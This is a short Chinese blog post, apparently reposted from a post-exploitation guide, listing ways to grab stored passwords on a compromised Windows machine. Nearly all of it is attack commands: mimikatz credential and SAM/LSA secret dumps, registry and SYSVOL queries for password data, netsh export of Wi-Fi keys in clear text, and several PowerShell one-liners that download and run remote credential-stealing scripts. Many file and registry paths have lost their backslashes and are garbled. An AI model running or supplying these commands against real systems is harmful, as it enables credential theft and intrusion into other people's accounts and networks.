密码抓取
创建时间:2019-10-14 20:46
字数:468
阅读:
密码抓取 转自后渗透凭证收集 url:http://www.mottoin.com/detail/2211.html
一、浏览器 chrome 1 2 3 4 5 C:UsersAdministratorAppDataLocalGoogleChromeUser DataDefault firefox C:UsersAdministratorAppDataLocalMozillaFirefoxProfiles IE C:UsersAdministratorAppDataLocalMicrosoftCredentials
也可使用工具进行抓取 BrowserPasswordDump.exe支持导出如下密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 Firefox Google Chrome Microsoft Edge Internet Explorer UC Browser Torch Browser Chrome Canary/SXS CoolNovo Browser Opera Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser
二、windows凭据管理器
cmdkey /list
1 2 3 4 RDP连接记录 reg query "HKCUSoftwareMicrosoftTerminal Server ClientDefault" 抓取密码 powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
也可以用mimikatz
mimikatz.exe vault::cred
三、邮箱 EmailPasswordDump.exe支持导出如下密码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail Opera Mail The Bat! Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager OutlookPasswordDump.exe
四、软件注册表
REG query “HKEY_CURRENT_USERSoftware” /v “password” /s 《后渗透凭证收集》
五、无线密码 列出连接过的wifi
netsh wlan show profiles
导出密码
netsh wlan export profile interface=无线网络连接 key=clear folder=C:windowstemp
六、VPN
C:UsersAdministratorAppDataRoamingMicrosoftNetworkConnectionsPbk
mimikatz抓VPN密码
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
七、windows其他部分信息 无人值守安装 1 2 3 4 5 6 7 8 9 10 11 12 13 C:unattend.xml C:WindowsPantherUnattend.xml C:WindowsPantherUnattendUnattend.xml C:Windowssystem32sysprep.inf C:Windowssystem32sysprepsysprep.xml windows密码错误提示信息 reg query HKLMSAMSAMDomainsAccountUsers<userkey>UserPasswordHint windows缓存hash reg query HKEY_LOCAL_MACHINESECURITYCACHE gpp dir \<DOMAIN>SYSVOL /s /b /A | find ".xml" windows自动登录 reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon"
八、laZagne 抓多种类型密码小工具
https://github.com/AlessandroZ/LaZagne.git 支持抓取的密码如下
1 chats,mails,all,git,svn,database,windows,wifi,sysadmin,browsers,games,memory,php,maven
九、进程相关 从目标进程中搜索敏感字符串 1 powershell "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1');Invoke-mimikittenz"
进程如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 #####Webmail##### Gmail Office365 Outlook Web #####Accounting##### Xero MYOB #####Remote Access##### Juniper SSL-VPN Citrix NetScaler Remote Desktop Web Access 2012 #####Developement##### Jira Github Bugzilla Zendesk Cpanel #####IHateReverseEngineers##### Malwr VirusTotal AnubisLabs #####Misc##### Dropbox Microsoft Onedrive AWS Web Services Slack Twitter Facebook
其他信息 FileZilla、PuTTY、WinSCP、rdp
1 powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1');Invoke-SessionGopher"
Teamviewer https://github.com/vah13/extractTVpasswords.git
mcafee %AllUsersProfile%Application DataMcAfeeCommon FrameworkSiteList.xml
SNMP reg query "HKLMSYSTEMCurrentControlSetServicesSNMP"
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 cxaqhq@qq.com
文章标题: 密码抓取
文章字数: 468
本文作者: cx
发布时间: 2019-10-14, 20:46:00
最后更新: 2019-10-14, 21:17:12